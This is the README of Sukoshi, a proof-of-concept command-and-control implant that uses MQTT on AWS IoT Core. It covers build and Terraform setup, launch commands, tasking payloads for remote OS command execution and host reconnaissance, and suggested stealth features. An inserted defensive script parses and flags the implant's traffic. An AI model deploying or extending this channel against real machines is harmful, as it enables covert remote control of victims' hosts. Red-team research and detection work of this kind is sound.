Sukoshi is a proof-of-concept Python/C++ implant that leverages the MQTT protocol for C2 and uses AWS IoT Core as infrastructure. It is intended to demonstrate the use of MQTT for C2 and the way in which IoT cloud services can be integrated with an implant.
Note: This project was not built to be used in a production setting. It is designed as a proof-of-concept and it intentionally omits many features that would be expected in a modern C2 project. For OPSEC considerations, see here.
- Automated setup and deployment of an implant using MQTT for C2. Can be used to easily test and analyze an implant leveraging this protocol.
- Connects AWS IoT Core to an implant. Can be further expanded to integrate AWS services such as IoT Analytics for logging/data analysis/visualization and IoT Events for automated response to significant data events.
C2 operators face many challenges such as having to manage a fleet of agents, implement a secure communications channel, quickly respond to events and log/analyze/visualize data. These same issues are being addressed by cloud providers who offer IoT services. As a result, they can be leveraged for C2 and implant management. This project uses AWS IoT Core as infrastructure, but other providers could possibly be re-purposed for C2 as well (Azure IoT, HiveMQ).
AWS offers sophisticated IoT services and capabilities that can be readily adapted for C2. As an example, telemetry from operators and implants can be stored, prepared, analyzed and fed into machine learning models using IoT Analytics. The IoT Device Defender service can be used to run regular audits on deployed implants, check for anomalous activity and produce alerts.
Telemetry gathered in IoT Core is not restricted to IoT services. Using Rules for AWS IoT, your implant data can be forwarded to many other services in the AWS ecosystem. You can do things like pass the data to Lambda functions, store it in DynamoDB or S3, send the data to Amazon Machine Learning to make predictions based on an Amazon ML model, start execution of a Step Functions state machine, and much more.
I believe that this project only scratches the surface of what can be done with cloud IoT service providers. The time saved by not needing to implement these capabilities by yourself is enormous. You can instantly get access to sophisticated services that are highly beneficial to C2 operators.
The AWS IoT Python libraries are needed by the implant and can be installed with the steps below:
- From the root of the Sukoshi project, navigate to the `/python` directory
- Execute the following command to install the Python dependencies:
  ```
  pip install -r requirements.txt
  ```
- A Windows 10 host was used as the environment for testing/compilation.
- Visual Studio 2019 was used for development of this project.
- The Visual Studio package Desktop Development with C++ was installed to support building the implant in C++.
- CMake was used to build and install the required AWS IoT libraries; it can be installed from here.
- vcpkg was used to build and install the required Boost Property Tree libraries; it can be installed from here.
- Git is needed to fetch the required libraries from GitHub and can be installed for Windows here.
The AWS IoT C++ libraries and Boost Property Tree libraries are needed by the implant and can be installed with the steps below:
I've used the script located here to automate installation of the AWS IoT libraries on my host. I've used the script located here to automate installation of vcpkg and the Boost Property Tree libraries on my host. You may be able to use these scripts to perform the same automated installs on your host or you can use them as a template for your own custom installation.
To build the AWS IoT C++ libraries, create a directory within a short path (e.g. `C:\dev\iotsdk`), navigate into the newly created directory and execute the following commands:
```
mkdir sdk-cpp-workspace
cd sdk-cpp-workspace
git clone --recursive https://github.com/aws/aws-iot-device-sdk-cpp-v2.git
mkdir aws-iot-device-sdk-cpp-v2-build
cd aws-iot-device-sdk-cpp-v2-build
cmake -DCMAKE_INSTALL_PREFIX="C:\dev\iotsdk\sdk-cpp-workspace" ../aws-iot-device-sdk-cpp-v2
cmake --build . --target install --config "Release"
```
To build the Boost Property Tree libraries, navigate to the location of your vcpkg install and execute the following commands:
```
.\vcpkg.exe install boost-property-tree:x64-windows
.\vcpkg.exe integrate install
```
The included Visual Studio project should be pre-configured to include all the required directories and dependencies. It has been hardcoded with the `C:\dev\iotsdk\sdk-cpp-workspace` path for the AWS IoT SDK dependencies. If you would like to select an alternative path for these dependencies, perform the following steps where `C:\dev\iotsdk\sdk-cpp-workspace` is replaced with your custom installation path:
- Set the following flags in the solution: `Release`, `x64`
- In project properties, set "C/C++ > General > Additional Include Directories" to `C:\dev\iotsdk\sdk-cpp-workspace\include`
- In project properties, set "Linker > Input > Additional Dependencies" to:
  ```
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-crt-cpp.lib
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-mqtt.lib
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-event-stream.lib
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-checksums.lib
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-s3.lib
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-auth.lib
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-http.lib
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-io.lib
  Secur32.lib
  Crypt32.lib
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-compression.lib
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-cal.lib
  NCrypt.lib
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-sdkutils.lib
  C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-common.lib
  BCrypt.lib
  Kernel32.lib
  Ws2_32.lib
  Shlwapi.lib
  kernel32.lib
  user32.lib
  gdi32.lib
  winspool.lib
  shell32.lib
  ole32.lib
  oleaut32.lib
  uuid.lib
  comdlg32.lib
  advapi32.lib
  ```
- In project properties, set "C/C++ > Language > Conformance mode" to `No (/permissive)`. Otherwise, when you try to execute a build, you will get an error for the file `StringView.h` on line 861:
  ```
  Error C7527 'Traits': template parameter name cannot be redeclared
  ```
- If you are interested in tracking the status of this issue, see the following: aws/aws-iot-device-sdk-cpp-v2#372
This project includes Terraform files to automate deployment of the AWS IoT Core infrastructure that is needed by the implant.
The following resources will be created in the target AWS account:
- AWS IoT Certificate
- AWS IoT Policy
- AWS IoT Thing
The certificates needed to connect the implant with AWS infrastructure will be created in the `/terraform/certs` folder.
The process for setting this up is as follows:
- Ensure you have Terraform set up and installed (https://learn.hashicorp.com/tutorials/terraform/install-cli)
- Ensure you have AWS user credentials with the proper IAM permissions configured on the CLI (https://docs.aws.amazon.com/cli/latest/userguide/getting-started-quickstart.html). For testing purposes, you can attach the managed policy `AWSIoTConfigAccess` to the user.
- From the command line, navigate to the `/terraform` folder
- Execute the following commands to set up the required infrastructure using Terraform:
  ```
  terraform init
  terraform plan
  terraform apply
  ```
- Take note of the `python_implant_command_line` and `cpp_implant_command_line` output from Terraform; it will be used to start the implant builds for Python and C++ respectively
- Execute the following command to destroy the infrastructure when finished testing:
  ```
  terraform destroy
  ```
The implant has been configured with very basic functionality to demonstrate the usage of MQTT for C2 and integration with AWS IoT Core. For simplicity, interaction with the implant by an operator is primarily done through the MQTT test client in the AWS IoT Core console page.
The following is an example of the end-to-end flow for the implant C2:
- Navigate to the AWS IoT Core console page
- Under the "Test" dropdown in the sidebar, click "MQTT test client"
- On the "Subscribe to a topic" tab in the "Topic filter" field, enter `c2/results` as a topic and click "Subscribe". Note that `c2/results` appears under the "Subscriptions" window.
- Repeat the above step for the `c2/tasking` and `c2/heartbeat` topics. For convenience, you may choose to favorite each of these subscribed topics by clicking the heart icon.
- There are two builds of the implant (Python/C++) and their execution instructions will vary:
  - For Python, navigate to the root directory of Sukoshi and start the implant by executing the command line obtained from the Terraform output (`python_implant_command_line`); a sample can be seen below:
    ```
    python ./python/implant.py --endpoint example-ats.iot.us-east-1.amazonaws.com --cert terraform/certs/sukoshi_implant.cert.pem --key terraform/certs/sukoshi_implant.private.key --client-id sukoshi_client_id --port 443
    ```
  - For C++, compile the implant by opening the Visual Studio solution (`/cpp/Sukoshi/Sukoshi.sln`) and building with the `Release`, `x64` flags. Start the implant by opening a PowerShell terminal window, navigating to the root directory of Sukoshi and executing the command line obtained from the Terraform output (`cpp_implant_command_line`); a sample can be seen below:
    ```
    ./cpp/Sukoshi/x64/Release/Sukoshi.exe --endpoint example-ats.iot.us-east-1.amazonaws.com --cert terraform/certs/sukoshi_implant.cert.pem --key terraform/certs/sukoshi_implant.private.key --client-id sukoshi_client_id --port 443
    ```
- Observe that output begins to appear in the `c2/heartbeat` channel
- Click on the "Publish to a topic" tab and enter `c2/tasking` in the "Topic name" field
- In the "Message payload" field, enter the following:
  ```json
  {
    "task": "ping",
    "arguments": ""
  }
  ```
- Click the "Publish" button and observe that the task is published to the `c2/tasking` topic in "Subscriptions"
- Observe the implant receiving the task, performing the work and publishing results. The following sample is from the Python build:
  ```
  Publishing message to topic 'c2/heartbeat': {"contents": "heartbeat", "success": "true"}
  Received message from topic 'c2/tasking': b'{\n "task": "ping",\n "arguments": ""\n}'
  Publishing message to topic 'c2/heartbeat': {"contents": "heartbeat", "success": "true"}
  Publishing message to topic 'c2/results': {"contents": "pong", "success": "true"}
  ```
- Observe the results appear in the `c2/results` topic:
  ```json
  {
    "contents": "pong",
    "success": "true"
  }
  ```
- To view other sample tasking payloads, see the Supported Tasks section. Tasking format will be the same for both Python and C++ builds.
The following are sample payloads for supported tasks you can paste into the "Message payload" field within the AWS "MQTT test client" page.
Execute an OS command and retrieve the results. In this case, the `whoami` command is provided.
```json
{
  "task": "exec",
  "arguments": "whoami"
}
```
Gather basic details about the host where the implant is running, including host name and OS info.
```json
{
  "task": "host-recon",
  "arguments": ""
}
```
Send a ping and get back a pong. Simple task used to validate end-to-end C2.
```json
{
  "task": "ping",
  "arguments": ""
}
```
Set the time the implant should wait before executing tasks and returning results. Time is in seconds.
```json
{
  "task": "set-dwell-time",
  "arguments": "10"
}
```
Ask the implant to end the beaconing loop and disconnect from the endpoint.
```json
{
  "task": "exit",
  "arguments": ""
}
```
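As an added example that is not part of the Sukoshi project, the following Python script shows how a defender or analyst reviewing the implant's console output (the `Publishing message to topic` / `Received message from topic` lines shown in the end-to-end flow above) would parse it and check every `c2/tasking` payload against the task schema given in the Supported Tasks list: unknown task names, non-numeric dwell times, unexpected keys and non-JSON payloads are reported as malformed, and `exec` tasks are flagged for alerting because they run an arbitrary OS command on the host. The log lines it runs over are constructed from the README's samples; the function names and the `HIGH_RISK_TASKS` set are this example's own, not anything the project defines.

```python
"""Triage helper for Sukoshi-style MQTT C2 console output.

Added example, not Sukoshi project code. Parses the implant's printed
"Publishing message to topic ..." / "Received message from topic ..."
lines, decodes the JSON payloads, validates c2/tasking messages against
the {"task", "arguments"} schema documented in the README and flags the
tasks a defender would want an alert on.
"""
import ast
import json
import re
from typing import List, Optional, Tuple

LOG_LINE = re.compile(
    r"^(?P<direction>Publishing message to|Received message from) topic "
    r"'(?P<topic>[^']+)': (?P<payload>.*)$"
)

# Task names and argument rules taken from the README's Supported Tasks list.
KNOWN_TASKS = {"exec", "host-recon", "ping", "set-dwell-time", "exit"}
NO_ARGUMENT_TASKS = {"host-recon", "ping", "exit"}
HIGH_RISK_TASKS = {"exec"}  # arbitrary OS command execution on the host (example's own label)


def decode_payload(raw: str) -> Optional[dict]:
    """Turn the printed payload into a dict; None if it is not a JSON object."""
    text = raw.strip()
    if text.startswith(("b'", 'b"')):
        # The Python build prints received payloads as a bytes repr (b'...').
        # ast.literal_eval only evaluates literals, so it is safe on untrusted text.
        try:
            value = ast.literal_eval(text)
            if not isinstance(value, bytes):
                return None
            text = value.decode("utf-8")
        except (ValueError, SyntaxError, UnicodeDecodeError):
            return None
    try:
        parsed = json.loads(text)
    except json.JSONDecodeError:
        return None
    return parsed if isinstance(parsed, dict) else None


def parse_log_line(line: str) -> Optional[dict]:
    """Split one console line into direction, topic and decoded payload."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    return {
        "direction": "outbound" if m["direction"].startswith("Publishing") else "inbound",
        "topic": m["topic"],
        "payload": decode_payload(m["payload"]),
    }


def validate_task(payload: Optional[dict]) -> Tuple[bool, str]:
    """Check a c2/tasking payload against the documented task schema."""
    if payload is None:
        return False, "payload is not a JSON object"
    if set(payload) != {"task", "arguments"}:
        return False, "unexpected keys: %s" % sorted(payload)
    task, args = payload["task"], payload["arguments"]
    if not isinstance(task, str) or not isinstance(args, str):
        return False, "task and arguments must be strings"
    if task not in KNOWN_TASKS:
        return False, "unknown task %r" % task
    if task == "set-dwell-time" and not args.isdigit():
        return False, "set-dwell-time needs a whole number of seconds"
    if task in NO_ARGUMENT_TASKS and args != "":
        return False, "%s takes no arguments" % task
    return True, "ok"


def triage(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, category, detail) findings for a list of console lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_log_line(line)
        if rec is None:
            continue  # not an implant message line
        if rec["topic"] == "c2/tasking":
            ok, reason = validate_task(rec["payload"])
            if not ok:
                findings.append((n, "malformed-task", reason))
            elif rec["payload"]["task"] in HIGH_RISK_TASKS:
                findings.append((n, "high-risk-task", "exec: %r" % rec["payload"]["arguments"]))
        elif rec["payload"] is None:
            findings.append((n, "undecodable-payload", rec["topic"]))
    return findings


# Constructed sample, modelled on the README's Python build output.
SAMPLE_LOG = [
    "Publishing message to topic 'c2/heartbeat': {\"contents\": \"heartbeat\", \"success\": \"true\"}",
    "Received message from topic 'c2/tasking': b'{\\n \"task\": \"ping\",\\n \"arguments\": \"\"\\n}'",
    "Publishing message to topic 'c2/results': {\"contents\": \"pong\", \"success\": \"true\"}",
    "Received message from topic 'c2/tasking': b'{\"task\": \"exec\", \"arguments\": \"whoami\"}'",
    "Received message from topic 'c2/tasking': b'{\"task\": \"set-dwell-time\", \"arguments\": \"ten\"}'",
    "Received message from topic 'c2/tasking': not json at all",
]

if __name__ == "__main__":
    for line_no, category, detail in triage(SAMPLE_LOG):
        print("line %d: %s (%s)" % (line_no, category, detail))
```

Run stand-alone it reports the `exec` task on line 4 and the two malformed tasking messages on lines 5 and 6; heartbeat and results traffic produces no findings. The same `triage` function can be pointed at a captured console transcript, and the schema check is deliberately strict (exact key set, string-typed fields) so that anything deviating from the documented format stands out rather than being silently accepted.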
Due to the PoC nature of this project, it was not built with OPSEC in mind. However, I will outline some possible features that could be present in a production deployment of this kind of project:
- Automated setup of redirectors to obscure the AWS IoT endpoint
- Overhaul of command execution tasking to support stealthier implementations
- Leverage alternate IoT cloud service providers as a fallback
- Variable beaconing using jitter
- Encryption of tasking and results in the event that the communications channel is compromised
- Daniel Abeles (@Daniel_Abeles) and Moshe Zioni for their work while at Akamai Threat Research. Their MQTT-PWN project served as an excellent reference during development:
- Soracom Labs, for the Terraform AWS IoT setup files: https://github.com/soracom-labs/soracom-beam-to-aws-iot-terraform
- AWS for their IoT Device SDK sample code: